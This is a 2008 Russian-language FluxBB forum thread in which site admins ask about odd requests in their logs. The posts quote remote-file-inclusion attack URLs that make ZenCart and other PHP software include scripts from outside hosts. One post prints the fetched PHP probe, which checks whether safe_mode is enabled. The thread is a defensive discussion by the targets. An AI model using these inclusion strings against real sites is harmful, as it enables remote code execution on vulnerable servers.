Русское сообщество fluxbb

Быстрый лёгкий надёжный форумный движок

Вы не вошли.

Объявление

Вы можете внести свой вклад в содержание сайта. Жертвователи попадут в почетную группу "Спонсоры". Поддержать сайт.

#1 2008-03-16 06:43:26

Visman
Гость

Странный запрос

Сегодня ночью очень странный запрос был на форуме:

/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://channels.dal.net/irwan/test.txt?

с адреса 85.17.200.74
Зашел по урлу который в запросе прописан, а там какой-то php скрипт прописан smile
Кто с этим сталкивался?
Дырки ищут? И я так понимаю через настройки сервера.
Или я не прав?

#2 2008-03-16 08:31:27

hcs
Гость

Re: Странный запрос

Дырки, но не в настройках сервера, а в движке магазина ZenCart  :  http://www.xakep.ru/post/33407/default.asp

#3 2008-03-16 09:07:48

Visman
Гость

Re: Странный запрос

Ясно

#4 2008-03-18 17:37:04

Visman
Гость

Re: Странный запрос

Вот еще странный запрос smile

/index.php?title=http://angel.yum.pl/joomla/images/borda10.jpg?

#5 2008-03-19 08:46:37

private_joker
Гость

Re: Странный запрос

Ага была подобная фигня, раза 3.

/viewtopic.php=http://мутный_хостинг.*.jpg

Тоже насторожило. Явно попытка выполнить код.

#6 2008-03-29 15:31:42

private_joker
Гость

Re: Странный запрос

А вот и содержание якобы gif файла.

<?php
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "Modo_Seguro_off"; }
else { $SafeMode = "Modo_Seguro_on"; } 
echo $SafeMode;
?>

Чет им интересно стало включен ли сейфмод или нет. Ip дает *****.veloxzone.com.br скрипт был залит на какой-то словацкий инет-магазин.
Озадачилсо...

#7 2008-03-29 15:49:25

Visman
Гость

Re: Странный запрос

На уровне браузера с этой бякой борются или нет? Интересно.

Подвал доски

Под управлением FluxBB. Хостинг Digital Ocean

[ Сгенерировано за 0.021 сек, 8 запросов выполнено - Использовано памяти: 411 KB (Пик: 444.47 KB) ]